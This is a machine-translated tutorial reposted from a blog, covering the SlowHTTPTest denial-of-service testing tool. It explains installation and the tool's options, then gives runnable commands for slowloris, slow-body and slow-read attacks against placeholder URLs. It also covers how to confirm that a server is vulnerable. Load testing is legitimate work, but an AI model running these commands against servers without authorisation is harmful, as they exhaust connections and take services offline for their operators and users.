Slowhttptest slow attack tool use details

GorillaLee 2021-02-02 04:42:07
slowhttptest slow attack tool use


Reference article

This article is for learning only , Don't break the law !


One 、 Brief introduction

SlowHTTPTest Is a slow attack on the server test software , The so-called slow attack is relative to cc perhaps DDoS It's fast , It's not the only way to hang up a server with a large amount and fast speed , Using slow attack can sometimes achieve the same effect .slowhttptest Including several slow attack methods before , Include slowloris, Slow HTTP POST, Slow Read attack etc. . So the principle of these slow attack tools is to find a way to make the server wait , When the server is holding the connection waiting , Nature consumes resources .

Two 、 Download and install

Kali Linux:

apt-get install slowhttptest

other Linux Distribution version :

tar -xzvf slowhttptest-x.x.tar.gz
cd slowhttptest-x.x
./configure --prefix=PREFIX
make
sudo make install

PREFIX Replace with... Should be installed slowhttptest The absolute path of tools .
Need to install libssl-dev To compile the tool successfully .

MacOS Installation command :

brew update && brew install slowhttptest

git install :

git clone https://github.com/shekyan/slowhttptest

3、 ... and 、 Perform use

Default parameter test
./slowhttptest
Parameters related to its response :

test type Test type
number of connections The number of connections
URL website
verb Verb
interval between follow up data The interval between random data
connections per second Connections per second
test duration Test time
probe connection timeout Probe connection timeout
max length of followup data field The maximum length of subsequent data fields

1、 Parameter description

Options describe
-a Start For range header testing range-specifier The starting value of
-b byte Scope specifier restrictions for scope header tests
-c The number of connections Be limited to 65539
-d Proxy host : port adopt Web The agent directs all traffic
-e Proxy host : port Used only through Web The agent detects traffic directionally
-H,B,R or X Specifies to slow down in the header section or message body ,-R Enable range testing ,-X Enable slow read test
-f Content type The value of the content type header
-g Generate CSV and HTML Statistics in the format , The format is slow_xxx.csv / html, among xxx It's time and date
-i second The interval between the subsequent data of each connection ( In seconds )
-j cookie Cookie Header value ( for example :-j“ user_id = 1001; Overtime = 9000”)
-k Pipeline coefficient If the server supports HTTP The Conduit , The number of times a request is repeated for a slow read test on the same connection .
-l second Test duration ( In seconds )
-m Accept Accept Header value
-n second The interval between read operations from the receive buffer
-o file Customize the output file path and / Or name , If you specify -g, Effective
-p second Wait for the probe to connect HTTP Response timeout , After that, the server is considered inaccessible
Per second -r A connection Connection rate
-s byte If you specify -B, be Content-Length Header value
-t Verb The custom verb to use
-u URL The goal is URL, Same format as you type in your browser , for example http s:// host [:port] /
-v level journal 0-4 Level of detail
-w byte The beginning of the scope , The size of the advertising window will be selected from
-x byte The maximum length of follow-up data
-y byte The end of the range , The size of the advertising window will be selected from
-z byte Through a single read() Operation reads bytes from the receive buffer

2、 Function command

slowloris Pattern :

slowhttptest -c 1000 -H -i 10 -r 200 -t GET -u https://yourtarget.com/index.html -x 24 -p 3

Slow Body attack :
Examples of usage in slow message body mode

slowhttptest -c 1000 -B -g -o my_body_stats -i 110 -r 200 -s 8192 -t FAKEVERB -u http://www.mywebsite.com -x 10 -p 3

Slow Read Pattern :

slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://yourtarget.co

Examples of usage in slow mode :

./slowhttptest -c 1000 -H -g -o my_header_stats -i 10 -r 200 -t GET -u https://myseceureserver/resources/index.html -x 24 -p 3

By means of xxxx:8080 The agent on the :

./slowhttptest -c 1000 -X -r 1000 -w 10 -y 20 -n 5 -z 32 -u http://someserver/somebigresource -p 5 -l 350 -e x.x.x.x:8080

3、 error message

error message What's the meaning of this?
"Hit test time limit" The program has achieved the goal of -l The time limit specified by the parameter
"No open connections left" Peers shut down all connections
"Cannot establish connection" Before the test N No connection established in seconds , among N yes -i The value of the parameter , Or is it 10( If not specified ). If there is no route to the host or if the remote peer is disconnected , And that happens
"Connection refused" The remote peer does not accept connections on the specified port ( Only from you ? Probe with proxy )
"Cancelled by user" You pressed Ctrl-C Or in some other way SIGINT
"Unexpected error" It will never happen

3、 The basis of judgment

  1. When the server is controllable , You can confirm the existence of the vulnerability with the following command :
pgrep http | wc -l  Number of processes
netstat -antp | grep 443 | wc -l  Number of network connections
  1. At the time of the attack , If the service cannot be accessed normally, there is a vulnerability .
版权声明
本文为[GorillaLee]所创,转载请带上原文链接,感谢
https://qdmana.com/2021/02/20210201000218176S.html

  1. css单位
  2. CSS unit
  3. 前端验证集合
  4. Front end validation collection
  5. Front end learning (4) -- response line, response head, response body
  6. Lesson 27: using time measuring tools to explore available spare time
  7. CSS 单位
  8. CSS unit
  9. 前端工具集合
  10. Front end Tools Collection
  11. Introduction to HTTP message format
  12. Introduction to new features of HTML5
  13. Common instructions for Vue
  14. Introduction of bootstrap Blazer component library
  15. HTML5 速览
  16. HTML5 quick view
  17. HTML表格自动排序
  18. For less than $1700, create a private cloud with openstack
  19. Basic learning of JavaScript (1)
  20. 前端编程之路一一HTML标签分类
  21. Front end Programming: HTML tag classification
  22. ColSpan and rowspan merging cells of HTML form elements
  23. JavaScript 日期时间格式化
  24. JavaScript date time formatting
  25. Classification of front end interview questions - html2
  26. CSS block elements
  27. HTML5 form detailed tutorial
  28. HTML5 form detailed tutorial
  29. HTML5新增的元素表
  30. New element table in HTML5
  31. 3D轮播插件vue-carousel-3d非官方最全文档
  32. 3D carousel plug-in vue-carousel-3d
  33. Uniapp (Vue general) integrates Tencent location service SDK -- multi platform small program general
  34. HTML summary (2)
  35. Overview of CSS3
  36. Front end abnormal monitoring system
  37. 免费网站部署和免费数据库Serverless云存储资源汇总整理
  38. Free website deployment and collection of free database serverless cloud storage resources
  39. Vux form -- a form solution of base vux
  40. 可以直接用于HTML中的特殊字符表 unicode字符集
  41. Can be directly used in HTML special character table Unicode character set
  42. Detailed explanation of HTTP protocol
  43. HTTP request header and request response header
  44. CSS background深度解析
  45. Python web/HTML GUI
  46. Front end standard 2: HTML you know and don't know
  47. Some HTML tags
  48. HTML标签之table
  49. Table of HTML tag
  50. DataTables of jQuery plug-in
  51. Unity calls Google's free translation API (HTTPS interface). Young people don't speak martial arts. How can they speak in multiple languages
  52. Linux entry most commonly used commands, do not learn a bunch of useless commands
  53. Piziheng embedded: a list of common short-range wireless communication protocols (Wi Fi / Bluetooth / ZigBee / thread...)
  54. Naming rules for the front end team of ladder
  55. HTML logo related symbols
  56. Node . JS: development resources and technology stack arrangement
  57. Unity calls Google's free translation API (HTTPS interface). Young people don't speak martial arts. How can they speak in multiple languages
  58. Straighten out JavaScript (18) - statements and operators
  59. Employment information statistics network (interface document)
  60. css selector